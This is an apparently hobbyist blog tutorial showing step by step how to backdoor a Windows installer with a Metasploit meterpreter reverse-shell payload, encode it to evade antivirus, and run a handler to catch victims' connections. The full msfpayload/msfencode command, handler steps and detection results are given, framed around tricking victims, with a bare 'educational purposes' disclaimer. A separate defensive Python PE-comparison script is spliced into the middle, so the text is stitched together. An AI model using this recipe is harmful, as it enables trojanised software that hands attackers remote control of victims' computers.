How was the weekend?? All good and hung over? Good! For today, a tutorial on how to backdoor any .EXE file with msfpayload. About a decade ago, when I first discovered RAT (Remote Administration Tool) programs, I had to go through various binders, cryptors and icon changers to try and successfully bind an .EXE with an exploit or malware. Finding an undetectable RAT was an even bigger problem. Of course, back then my programming skills were beyond shit for me to whip up a stable, undetectable RAT, so plan B was to whip up a shitty winsock program in Visual Basic. It was a horrible, unstable program, but it was undetectable and I could bind it with the .EXE without any worry of AV detection. It did enough to get me access into the victim's computer long enough so I could modify the AV files and upload a working, stable, detectable RAT. Oh, fun times!!
But how time flies! Thanks to the beauty that is Metasploit, we can now backdoor any .EXE file.
NOTE: This tutorial only demonstrates how to bind an .exe with a Metasploit payload. I will not be explaining ways to get your victims to execute it. Your creativity is your duty. You may download the PDF version of this tutorial here.
Let's begin:
1) Locate your .exe and place it in your home directory as shown below.
2) To list the available payloads, type: msfpayload -l.
3) As shown below, we will be using windows/meterpreter/reverse_tcp.
4) Syntax to bind the file: msfpayload <payload> LHOST=<ip> LPORT=<port> R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x <.exe location> -o <output file name>.
5) So in my case I would type: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=666 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x /root/devcpp-setup.exe -o /root/devcpp-modified.exe.
6) I have instructed msfpayload to bind my .exe with a meterpreter/reverse_tcp payload and msfencode to encode it 6 times with x86/shikata_ga_nai. The payload is also set to connect back to my machine (LHOST 192.168.1.18) on port 666.
7) Our newly modified file can be found in our home directory.
8) Now that we have our modified executable ready, we need to set up a handler to manage incoming connections from our victims. Let's open a fresh tab and type: msfconsole.
9) To select the handler module, type: use exploit/multi/handler.
10) Set the same payload type, IP address and port number (PAYLOAD, LHOST and LPORT) that you declared when creating your modified .EXE (refer to point 6).
11) Finally, to start your handler, type: exploit.
12) Now, when you run the .exe on a victim computer or find a way to get them to execute it, your handler terminal will receive a meterpreter shell from your target's computer and access will be granted!
13) For the fun of it, I decided to scan the modified .EXE with VirusTotal: 7/41 detections, which I think is pretty decent for a standard setup. We used x86/shikata_ga_nai to encode our file 6 times; do try encoding it with different encoders to see the various results.
14) You can list the available encoders by typing show encoders in your msfconsole terminal.
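Because the backdoored file is built from the original installer as a template (msfencode's -x option), the defender's counterpart to this procedure is an integrity comparison of the two files. The Python below is an added example, not code from this tutorial or from Metasploit: it parses the PE headers of an original and a suspect executable and reports an entry-point change, a section only the suspect has, and any section marked both writable and executable. These are general tampering indicators rather than a Metasploit signature, and the sample inputs are constructed headers-only PE32 images with an invented section name.

```python
import struct

SECTION_FMT = "<8sIIIIIIHHI"    # IMAGE_SECTION_HEADER, 40 bytes
MEM_WRITE_EXECUTE = 0xA0000000  # IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE

def parse_pe(data: bytes) -> dict:
    """Return the entry point RVA and section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]      # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0] # SizeOfOptionalHeader
    opt_off = pe_off + 24                                     # optional header start
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]   # AddressOfEntryPoint
    sections = {}
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)
        name = f[0].rstrip(b"\0").decode("ascii", "replace")
        sections[name] = {"va": f[2], "characteristics": f[9]}
    return {"entry": entry, "sections": sections}

def compare_pe(original: bytes, suspect: bytes) -> list:
    """List header differences that commonly indicate an injected payload."""
    a, b = parse_pe(original), parse_pe(suspect)
    findings = []
    if a["entry"] != b["entry"]:
        findings.append(f"entry point moved 0x{a['entry']:x} -> 0x{b['entry']:x}")
    for name in sorted(b["sections"].keys() - a["sections"].keys()):
        findings.append(f"new section {name!r}")
    for name, sec in b["sections"].items():
        if sec["characteristics"] & MEM_WRITE_EXECUTE == MEM_WRITE_EXECUTE:
            findings.append(f"section {name!r} is writable and executable")
    return findings

def build_pe(entry: int, sections: list) -> bytes:
    """Constructed minimal PE32 image (headers only) used as sample input."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(0xE0, b"\0")
    table = b"".join(struct.pack(SECTION_FMT, n.encode().ljust(8, b"\0"),
                                 0x1000, va, 0, 0, 0, 0, 0, 0, ch)
                     for n, va, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table

if __name__ == "__main__":
    clean = build_pe(0x1000, [(".text", 0x1000, 0x60000020)])
    tampered = build_pe(0x3000, [(".text", 0x1000, 0x60000020), (".new", 0x3000, 0xE0000020)])
    print("\n".join(compare_pe(clean, tampered)))
```

For real files, pass the bytes of the vendor's installer and the suspect copy to compare_pe; an empty list means the header-level indicators did not fire, not that the file is clean.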
Author's Note:
1) This just demonstrates how to backdoor an exe for a local area network attack. You can easily make this an over-the-internet attack with a few tweaks to your settings (e.g. port forwarding, modifying the payload options). I will get to that in the upcoming lessons.
2) This is for educational purposes only.
3) Do NOT harm the innocent.
“Reality is just a crutch for people who can’t handle drugs.” ― Robin P. Williams